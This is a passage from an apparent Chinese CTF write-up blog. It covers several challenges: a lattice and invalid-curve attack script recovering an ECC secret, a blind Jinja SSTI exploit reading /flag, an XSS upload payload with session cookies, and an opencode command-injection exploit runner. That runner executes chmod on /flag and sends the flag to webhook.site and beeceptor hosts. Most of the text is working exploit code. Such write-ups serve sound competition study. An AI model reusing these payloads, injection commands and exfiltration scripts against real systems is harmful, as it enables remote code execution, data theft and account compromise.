        ti = (int(b) - ((int(mu) & 0xff) << 7)) % q
        t_list.append(int(ti))
    m = len(A_rows)
    A_ZZ = Matrix(ZZ, A_rows)
    t_ZZ = vector(ZZ, t_list)
    pwlog.info("building q-ary lattice for CVP ...")
    M = A_ZZ.augment(q * identity_matrix(ZZ, m))
    try:
        L = IntegerLattice(M.transpose(), lll_reduce=True)
    except TypeError:
        try:
            L = IntegerLattice(M.transpose())
        except Exception:
            L = IntegerLattice(M.transpose().LLL())
    except Exception:
        L = IntegerLattice(M.transpose().LLL())
    pwlog.info("running closest_vector ...")
    try:
        y = vector(ZZ, L.closest_vector(t_ZZ))
    except Exception:
        try:
            Bred = Matrix(ZZ, L.reduced_basis)
            coeff = Bred.solve_left(t_ZZ)
            coeff_round = vector(ZZ, [ZZ(round(float(c))) for c in coeff])
            y = vector(ZZ, Bred * coeff_round)
        except Exception as e:
            raise ValueError(f"closest_vector failed: {e}")
    maxerr = max(abs(int(x)) for x in e)
    pwlog.info(f"estimated max |error| = {maxerr}")
    A_mod = A_ZZ.change_ring(Zmod(q))
    rhs_mod = vector(Zmod(q), [int(v % q) for v in y])
    s = solve_s_from_consistent_system(A_mod, rhs_mod)
    priv = vec_to_int_base_q(s, q)
    pwlog.info(f"recovered priv bits = {int(priv).bit_length()}")
    return priv
def server_add(P1, P2, p=P, a=A_CURVE):
    if P1 is None:
        return P2
    if P2 is None:
        return P1

    x1, y1 = P1
    x2, y2 = P2
    p = int(p)
    a = int(a)
    if x1 == x2 and y1 == (-y2) % p:
        return None
    if P1 == P2:
        den = (2 * y1) % p
        if den == 0:
            return None
        m = ((3 * x1 * x1 + a) * inverse_mod(den, p)) % p
    else:
        den = (x2 - x1) % p
        if den == 0:
            return None
        m = ((y2 - y1) * inverse_mod(den, p)) % p
    x3 = (m * m - x1 - x2) % p
    y3 = (m * (x1 - x3) - y1) % p
    return (int(x3), int(y3))
def server_mul(Pt, k, p=P, a=A_CURVE):
    result = None
    addend = Pt
    k = int(k)
    while k > 0:
        if k & 1:
            result = server_add(result, addend, p, a)
        addend = server_add(addend, addend, p, a)
        k >>= 1

    return result
def find_invalid_small_order_points(limit_curves=600):
    F = GF(P)
    pts = []
    used_orders = set()
    used_prod = 1
    for b in range(1, int(limit_curves) + 1):
        try:
            E = EllipticCurve(F, [A_CURVE, b])
            ordE = E.order()
            fac = factor(ordE)
        except Exception:
            continue
        for l, e in fac:
            l = int(l)
            if l < 5 or l > int(MAX_SMALL_FACTOR):
                continue
            if l in used_orders:
                continue
            if gcd(l, used_prod) != 1:
                continue
            cof = ordE // l
            found = False
            for _ in range(20):
                try:
                    R = E.random_point()
                    Psmall = cof * R
                    if Psmall == E(0):
                        continue
                    if int(Psmall.order()) != l:
                        continue
                    x = int(Psmall[0])
                    y = int(Psmall[1])
                    if server_mul((x, y), l) is None:
                        pts.append((l, (x, y), b))
                        used_orders.add(l)
                        used_prod *= l
                        pwlog.info(f"found small-order point: ord={l}, b={b}")
                        pwlog.info(f"current small-subgroup CRT bits = {used_prod.bit_length()}")
                        found = True
                        break
                except Exception:
                    pass
            if found and used_prod.bit_length() > int(TARGET_BITS):
                return pts
    return pts
def dlog_small_subgroup(Pt, Qt, ordP):
    if Qt is None:
        return 0
    R = None
    for k in range(int(ordP)):
        if R == Qt:
            return k
        R = server_add(R, Pt)
    raise ValueError("small subgroup dlog failed")
def recover_master_mod_n(io, priv, small_point):
    ordP, Pt, _ = small_point
    x, y = Pt
    xin = int(x) ^ int(priv)
    yin = int(y) ^ int(priv)
    point_int = ((xin & ((1 << 256) - 1)) << 256) | (yin & ((1 << 256) - 1))
    out = send_e(io, point_int)
    Q = None if out == 0 else unpack_point(out)
    r = dlog_small_subgroup(Pt, Q, ordP)
    return int(r), int(ordP)
def decrypt_flag(enc_flag, master_sec):
    key = sha256(str(int(master_sec)).encode()).digest()
    pt = AES.new(key, AES.MODE_ECB).decrypt(enc_flag)
    try:
        return unpad(pt, 32)
    except Exception:
        return pt
def verify_master_pub(master_pub, d):
    G = (
        9,
        14781619447589544791020593568409986887264606134616475288964881837755586237401
    )
    return server_mul(G, int(d)) == master_pub
def attack_one_round(small_point):
    io = open_conn()
    try:
        printed_q, master_pub, enc_flag, _ = parse_banner(io)
        pwlog.info(f"printed_q = {printed_q}")
        pwlog.info(f"master_pub = {master_pub}")
        pwlog.info(f"enc_flag = {enc_flag.hex()}")
        samples = collect_round_samples(io, MAX_MSG)
        q_round = recover_round_q(samples, printed_q)
        pwlog.info(f"round q = {q_round}")
        priv = recover_round_priv(samples, q_round)
        ordP, Pt, b = small_point
        pwlog.info(f"using small subgroup ord = {ordP}, b = {b}")
        r, m = recover_master_mod_n(io, priv, small_point)
        pwlog.success(f"master_sec ≡ {r} (mod {m})")
        return {
            "residue": int(r),
            "modulus": int(m),
            "master_pub": master_pub,
            "enc_flag": enc_flag,
        }
    finally:
        try:
            io.close()
        except Exception:
            pass
def main():
    pwlog.info("precomputing invalid-curve small-order points ...")
    small_points = find_invalid_small_order_points(limit_curves=600)
    if not small_points:
        pwlog.failure("no small points found")
        return
    pwlog.info(f"got {len(small_points)} small-order points")
    residues = []
    moduli = []
    idx_point = 0
    while idx_point < len(small_points):
        ok = False
        last_err = None
        for tr in range(int(ROUND_RETRY)):
            try:
                pwlog.info(f"round try {tr+1}/{int(ROUND_RETRY)}")
                ret = attack_one_round(small_points[idx_point])
                ok = True
                break
            except Exception as e:
                last_err = e
                pwlog.info(f"round failed: {repr(e)}")
                time.sleep(1)
        if not ok:
            pwlog.failure(f"round permanently failed: {repr(last_err)}")
            return
        r = ret["residue"]
        m = ret["modulus"]
        master_pub = ret["master_pub"]
        enc_flag = ret["enc_flag"]

        residues.append(int(r))
        moduli.append(int(m))
        idx_point += 1
        cur_mod = int(lcm(moduli))
        cand = int(crt(residues, moduli))
        pwlog.info(f"CRT modulus bits = {cur_mod.bit_length()}")
        pwlog.info(f"current candidate = {cand}")
        if cur_mod.bit_length() >= 256:
            if verify_master_pub(master_pub, cand):
                pwlog.success("master_pub matched! decrypting flag ...")
                flag = decrypt_flag(enc_flag, cand)
                print(flag)
                return
            else:
                pwlog.info("candidate not verified yet, continue..."
    pwlog.failure("ran out of small-order points before recovery")
if __name__ == "__main__":
    main()

Web

N-Horse

打开只有一个登录界面,提交后发现用户名回显在页面上,尝试xss注入,可以注入但是没有管理员bot访问,f12查看到server是python,尝试ssti注入

输入{{}}正常回显,输入

输入{{7*7}}正常回显,输入{%%}回显500
输入{{[].__class__.}} 回显500
输入 {% for x in [].__class__.__base__.__subclasses__() %}
    
{% if x.__init__ is defined and x.__init__.__globals__ is defined and 'eval' in x.__init__.__globals__['__builtins__']['eval'].__name__ %}
        
{{ x.__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()') }}
    
{% endif %}
{% endfor %}
明显延迟,但是回显原文

所以是ssti的布尔盲注

查找文件
?username={{+(cycler.__init__.__globals__.__builtins__.__import__('os').path.exists('%2Fetc%2Fpasswd'))+or+1%2F0+}}&password=1
文件长度
{{ (cycler.__init__.__globals__.__builtins__.len(cycler.__init__.__globals__.__builtins__.open('/flag').read()) >= 32) or 1/0 }}
读取字母
{{ (cycler.__init__.__globals__.__builtins__.ord(cycler.__init__.__globals__.__builtins__.open('/flag').read()[0]) >= 78) or 1/0 }}
import requests

BASE_URL = "http://114.66.24.221:37878"
TARGET_FILE = "/flag"
BUILTINS = "cycler.__init__.__globals__.__builtins__"


class BlindSSTI:
    def __init__(self, base_url: str):
        self.session = requests.Session()
        self.session.trust_env = False
        self.base_url = base_url


#如果 expr 为 True → expr or 1/0 = True → 模板渲染正常 → HTTP 200。
#如果 expr 为 False → expr or 1/0 = 1/0 → 抛异常 → HTTP 500。
    def check(self, expr: str) -> bool:
        payload = "{{ (" + expr + ") or 1/0 }}"
        response = self.session.get(
            self.base_url,
            params={"username": payload, "password": "1"},
            timeout=10,
        )
        print(response.text)
        return response.status_code == 200


#检查文件是否存在。
    def file_exists(self, path: str) -> bool:
        return self.check(f"{BUILTINS}.__import__('os').path.exists({path!r})")


#二分法确定文件长度。
    def get_length(self, path: str, upper: int = 128) -> int:
        left, right = 0, upper
        while left < right:
            mid = (left + right + 1) // 2
            expr = f"{BUILTINS}.len({BUILTINS}.open({path!r}).read()) >= {mid}"
            if self.check(expr):
                left = mid
            else:
                right = mid - 1
        return left


#二分法获取某个字符的 ASCII 值。
    def leak_char(self, path: str, index: int) -> str:
        left, right = 0, 127
        while left < right:
            mid = (left + right + 1) // 2
            expr = (
                f"{BUILTINS}.ord({BUILTINS}.open({path!r}).read()[{index}]) >= {mid}"
            )
            if self.check(expr):
                left = mid
            else:
                right = mid - 1
        return chr(left)


#返回整个文件内容。
    def leak_file(self, path: str) -> str:
        length = self.get_length(path)
        print(f"[+] {path} length = {length}")
        chars = []
        for index in range(length):
            ch = self.leak_char(path, index)
            chars.append(ch)
            print(f"[+] {index:02d}: {ch!r} -> {''.join(chars)!r}")
        return "".join(chars)


def main():
    client = BlindSSTI(BASE_URL)
    if not client.file_exists(TARGET_FILE):
        raise SystemExit(f"[-] target file not found: {TARGET_FILE}")

    content = client.leak_file(TARGET_FILE)
    print("\n[+] Raw content:")
    print(repr(content))
    print("[+] Stripped:")
    print(content.strip())


if __name__ == "__main__":
    main()

NCTF{1f41be769e84_We1(#m3_to_NcTF}

N-MinSite

题目提示是xss

maintenance trace:

http://114.66.24.221:39664/require-maxsite/Y3RmL3VwZGF0ZS1rZXktcmVxdWlyZS1tYXhzaXR1LnBocA==

其中最后一段是 Base64。解码后是:

ctf/update-key-require-maxsitu.php

试了好多次最后发现直接传入?edge_key_release_2026然后获取zip包

阅读源码,在admin/plugins/admin_page/uploads-require-maxsite.php找到文件上传点,过下面这些if条件

// Все проверки.
if (!is_login()) die('no login');


if (isset($_SERVER['HTTP_X_REQUESTED_FILENAME']))
        $fn = $_SERVER['HTTP_X_REQUESTED_FILENAME'];
else 
        die('no file');

if (isset($_SERVER['HTTP_X_REQUESTED_FILEUPDIR']))
        $page_id = $_SERVER['HTTP_X_REQUESTED_FILEUPDIR'];
else 
        die('no updir');

if (!is_numeric($page_id)) die('wrong updir');

mso_checkreferer();

$ext = strtolower(substr(strrchr($fn, '.'), 1));

在staff login登录

在源码里/ctf-assets/user_account.txt里面拿到

username: user
password: minsite-user-2025
POST /require-maxsite/YWRtaW4vcGx1Z2lucy9hZG1pbl9wYWdlL3VwbG9hZHMtcmVxdWlyZS1tYXhzaXRlLnBocA== HTTP/1.1
Host: 114.66.24.221:49082
Upgrade-Insecure-Requests: 1
Content-Type: text/html; charset=UTF-8
X-Requested-Filename: 0000-xss.html
X-Requested-FileUpDir: 1
X-Requested-ReplaceFile: true 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Edg/146.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ci_session=a%3A19%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%226fd9c1586d6f1630281d53aeb8f226eb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A10%3A%2210.42.16.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F146.0.0.0%20Safari%2F537.36%20Edg%2F146.%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1775441611%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22userlogged%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22last_activity_prev%22%3Bi%3A1775441611%3Bs%3A7%3A%22comuser%22%3Bi%3A0%3Bs%3A8%3A%22users_id%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22users_nik%22%3Bs%3A4%3A%22user%22%3Bs%3A11%3A%22users_login%22%3Bs%3A92%3A%22MSO-KdqAvL7jhzJ22y1dbakOSvE2C8ITE2U4OGP%2FV%2BCVLmgkCRS8Utl7%2BkI2HEsAHt%2F44X7ABawFrdjwgAmM0JBQQw%3D%3D%22%3Bs%3A14%3A%22users_password%22%3Bs%3A132%3A%22MSO-r7YELUQ1vZfxMQGelSBxYhuZg%2FMG%2BsFvrp7fK7CkKdjzOcOOD%2FvdYMl87fxbVUyDCcPnKF2GdzChO%2Bbb67MWfMJfb6j3UTy5IZq97sZrxf7y2ifYRKJwqci8c3zJg2oE%22%3Bs%3A15%3A%22users_groups_id%22%3Bs%3A1%3A%222%22%3Bs%3A16%3A%22users_last_visit%22%3Bs%3A19%3A%222026-04-06%2002%3A10%3A24%22%3Bs%3A17%3A%22users_show_smiles%22%3Bs%3A1%3A%221%22%3Bs%3A15%3A%22users_time_zone%22%3Bs%3A4%3A%227200%22%3Bs%3A14%3A%22users_language%22%3Bs%3A2%3A%22ru%22%3Bs%3A16%3A%22users_avatar_url%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22users_email%22%3Bs%3A18%3A%22user%40minsite.local%22%3B%7D18213ec16d612cbd6073eee6431e054103776db9
Connection: close
Content-Length: 713

<h1>Loading...</h1>
<script>
(async()=>{
  const esc=s=>s.replace(/[&<>]/g,c=>({'&':'&','<':'<','>':'>'}[c]));
  try {
    const adminHtml=await fetch('/admin',{credentials:'include'}).then(r=>r.text());
    const body='<h2>admin dump</h2><pre>'+esc(adminHtml)+'</pre>';
    await fetch('/require-maxsite/'+btoa('admin/plugins/admin_page/uploads-require-maxsite.php'),{
      method:'POST',
      credentials:'include',
      headers:{
        'Content-Type':'text/html;charset=UTF-8',
        'X-Requested-Filename':'0000-admin-leak.html',
        'X-Requested-FileUpDir':'1',
        'X-Requested-ReplaceFile':'true'
      },
      body
    });
  } catch (e) {}
})();
</script>

返回主页面的admin dump得到

OpenShell

阅读源码大概是report路由下接收一个https://XXX.pages.dev的url,机器人对这个url扫描15秒,

chown node:node /flag/flag 的属主和属组都改成 node。也就是说,这个文件归 node 用户所有。

但后面马上又执行了 chmod 000 /flag。node用户启动opencode,然后运行机器人,搜到cve

https://zone.ci/secarticles/wx/515833.html

但是有浏览器同源限制,获取不到sessionID,所以尝试命令注入

对opencode代码进行追踪:

// packages/opencode/src/server/routes/file.ts:13const pattern = ctx.req.query("pattern")// ... passed to Ripgrep.search
// packages/opencode/src/file/ripgrep.ts:393const command = args.join(" ")// Line 394await $`${{ raw: command }}`

/internal/findpattern参数中注入命令:

https://dev.to/pachilo/the-classic-bug-command-injection-in-opencodes-server-mode-2pf1

chmod 644 /flag给Flag文件添加读权限。

然后用Node.js的https.get将Flag内容发送到攻击者控制的webhook.site(一个临时外带数据的服务)。

浏览器访问后,命令被执行,Flag被外带。

curl -i -X POST http://47.239.123.162:8000/report -H "Content-Type: application/json" -d "{\"url\": \"https://head-start.pages.dev/?location=http%3A%2F%2F127.0.0.1%2Finternal%2Ffind%3Fpattern%3Dx%253B%2520chmod%2520644%2520%252Fflag%253B%2520node%2520-e%2520%2522const%2520https%253Drequire%2528%2527https%2527%2529%252Cfs%253Drequire%2528%2527fs%2527%2529%253B%2520https.get%2528%2527https%253A%252F%252Fa-sd-fd-f.free.beeceptor.com%253Ff%253D%2527%252BencodeURIComponent%2528fs.readFileSync%2528%2527%252Fflag%2527%252C%2527utf8%2527%2529%2529%252C%2528%2529%253D%253E%257B%257D%2529%253B%2522%253B%2520%2523\"}"

有redoc文档可以直接写个自动化脚本

#!/usr/bin/env python3
"""
OpenShell direct exploit runner (new-token only).

Exploit chain:
1) Create fresh webhook.site token
2) Start short-lived instance via controller
3) Submit bot /report URL (.pages.dev wrapper)
4) Redirect bot to internal /find?pattern=<command-injection>
5) Inject shell command to exfil /flag to the fresh token
"""

from __future__ import annotations

import argparse
import sys
import time
from datetime import datetime, timezone
from typing import Any
from urllib.parse import parse_qs, quote, unquote, urlparse

import requests

def log(msg: str) -> None:
    print(f"[{time.strftime('%H:%M:%S')}] {msg}")

class HTTP:
    def __init__(self) -> None:
        self.s_env = requests.Session()
        self.s_env.trust_env = True
        self.s_raw = requests.Session()
        self.s_raw.trust_env = False
        self.sessions = [self.s_env, self.s_raw]

    def req(self, method: str, url: str, timeout: int = 15, **kwargs: Any) -> requests.Response:
        last: Exception | None = None
        for s in self.sessions:
            try:
                return s.request(method, url, timeout=timeout, **kwargs)
            except Exception as ex:
                last = ex
        assert last is not None
        raise last

    def json(self, method: str, url: str, timeout: int = 15, **kwargs: Any) -> dict[str, Any]:
        return self.req(method, url, timeout=timeout, **kwargs).json()

def create_token(http: HTTP) -> str:
    data = http.json("POST", "https://webhook.site/token", timeout=20)
    token = data.get("uuid")
    if not token:
        raise RuntimeError(f"create token failed: {data}")
    return token

def status(http: HTTP, controller: str) -> dict[str, Any]:
    return http.json("GET", f"{controller}/api/status", timeout=12)

def destroy(http: HTTP, controller: str) -> None:
    try:
        data = http.json("POST", f"{controller}/api/instance/destroy", timeout=20)
        log(f"destroy: {data.get('message', data)}")
    except Exception:
        pass

def start(http: HTTP, controller: str) -> None:
    data = http.json("POST", f"{controller}/api/instance/start", timeout=25)
    log(f"start: {data.get('message', data)}")

def seconds_left(expires_at: str | None) -> float | None:
    if not expires_at:
        return None
    try:
        dt = datetime.fromisoformat(expires_at.replace("Z", "+00:00"))
        return (dt - datetime.now(timezone.utc)).total_seconds()
    except Exception:
        return None

def ensure_instance(http: HTTP, controller: str, min_remaining: int, timeout: int) -> tuple[str, int]:
    try:
        st = status(http, controller)
    except Exception:
        st = {}

    inst = (st or {}).get("instance") or {}
    ip = inst.get("ip")
    port = int(inst.get("port", 8000))
    state = str(inst.get("status", "")).lower()
    exp = inst.get("expiresAt")

    if state == "running" and ip:
        remain = seconds_left(exp)
        if remain is None or remain >= min_remaining:
            log(f"reuse instance: {ip}:{port}, remain={remain}")
            return ip, port

    destroy(http, controller)
    time.sleep(1)
    start(http, controller)

    begin = time.time()
    while time.time() - begin < timeout:
        st = status(http, controller)
        inst = st.get("instance") or {}
        ip = inst.get("ip")
        port = int(inst.get("port", 8000))
        state = str(inst.get("status", "")).lower()
        if state == "running" and ip:
            log(f"instance ready: {ip}:{port} exp={inst.get('expiresAt')}")
            return ip, port
        if state in {"failed", "expired", "destroyed"}:
            raise RuntimeError(f"instance terminal state: {state}")
        time.sleep(2)

    raise TimeoutError("instance startup timeout")

def wait_bot(http: HTTP, ip: str, port: int, timeout: int) -> None:
    end = time.time() + timeout
    while time.time() < end:
        try:
            r = http.req("GET", f"http://{ip}:{port}/", timeout=6)
            log(f"bot reachable: http {r.status_code}")
            return
        except Exception:
            time.sleep(2)
    raise TimeoutError("bot not reachable")

def extract_flag(item: dict[str, Any]) -> str | None:
    q = item.get("query") or {}
    for key in ("f", "flag"):
        if key in q:
            v = q[key]
            if isinstance(v, list) and v:
                return str(v[0])
            if isinstance(v, str):
                return v
    u = item.get("url") or ""
    if u:
        d = parse_qs(urlparse(u).query)
        for key in ("f", "flag"):
            if key in d and d[key]:
                return str(d[key][0])
    return None

def poll_flag(http: HTTP, token: str, timeout: int) -> str | None:
    endpoint = f"https://webhook.site/token/{token}/requests?sorting=newest&per_page=10"
    end = time.time() + timeout
    while time.time() < end:
        try:
            items = http.json("GET", endpoint, timeout=15).get("data", [])
            for item in items:
                f = extract_flag(item)
                if f:
                    return unquote(f)
        except Exception:
            pass
        time.sleep(2)
    return None

def build_report_url(token: str) -> str:
    cmd = (
        "x; chmod 644 /flag; "
        "node -e \"const https=require('https'),fs=require('fs');"
        f"https.get('https://webhook.site/{token}?f='+encodeURIComponent(fs.readFileSync('/flag','utf8')),()=>{{}});\"; #"
    )

    inner = "http://127.0.0.1:4096/find?pattern=" + quote(cmd, safe="")
    return "https://head-start.pages.dev/api/preview/exit/?location=" + quote(inner, safe="")

def run_once(http: HTTP, controller: str, token: str, bot_timeout: int, min_remaining: int, startup_timeout: int, poll_seconds: int) -> str | None:
    ip, port = ensure_instance(http, controller, min_remaining=min_remaining, timeout=startup_timeout)
    wait_bot(http, ip, port, timeout=bot_timeout)

    report_url = build_report_url(token)
    resp = http.req("POST", f"http://{ip}:{port}/report", json={"url": report_url}, timeout=20)
    log(f"report: {resp.status_code} {resp.text[:160]}")
    if resp.status_code != 200:
        return None

    return poll_flag(http, token=token, timeout=poll_seconds)

def main() -> int:
    ap = argparse.ArgumentParser(description="OpenShell direct exploit with fresh token")
    ap.add_argument("--controller", required=True, help="e.g. http://114.66.24.221:44890")
    ap.add_argument("--rounds", type=int, default=4)
    ap.add_argument("--poll-seconds", type=int, default=90)
    ap.add_argument("--startup-timeout", type=int, default=150)
    ap.add_argument("--bot-timeout", type=int, default=70)
    ap.add_argument("--min-remaining", type=int, default=70)
    args = ap.parse_args()

    controller = args.controller.rstrip("/")
    http = HTTP()

    token = create_token(http)
    print(f"NEW_TOKEN={token}")
    print(f"WEBHOOK=https://webhook.site/{token}")

    for i in range(1, args.rounds + 1):
        print(f"\n=== round {i}/{args.rounds} ===")
        try:
            flag = run_once(
                http,
                controller=controller,
                token=token,
                bot_timeout=args.bot_timeout,
                min_remaining=args.min_remaining,
                startup_timeout=args.startup_timeout,
                poll_seconds=args.poll_seconds,
            )
            if flag:
                print("\n" + "=" * 66)
                print(f"FLAG={flag}")
                print("=" * 66)
                destroy(http, controller)
                return 0
            log("no flag this round")
            destroy(http, controller)
            time.sleep(2)
        except Exception as ex:
            log(f"round error: {ex}")
            time.sleep(2)

    print("FAILED: no flag")
    return 1

if __name__ == "__main__":
    sys.exit(main())

N-RustPICA

在http://114.66.24.221:34503/debug/config.json下找到账密,这里总结经验

用dirsearch扫出来debug目录后可以再扫一次

python dirsearch.py -u http://114.66.24.221:39677/debug/ -e json,txt,bak,zip

扫到/debug/config.json

{
  "adminUser": "anime_admin",
  "passwordParts": [
    "cHVyZXN0",
    "cmVhbQ=="
  ]
}

根据题目提示应该要想办法获取0007号的内部条目,但是因为是internal类型,description访问不到,就在发布草稿路径下使用旧审核工具改变status为published,成功读取0007内部条目

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇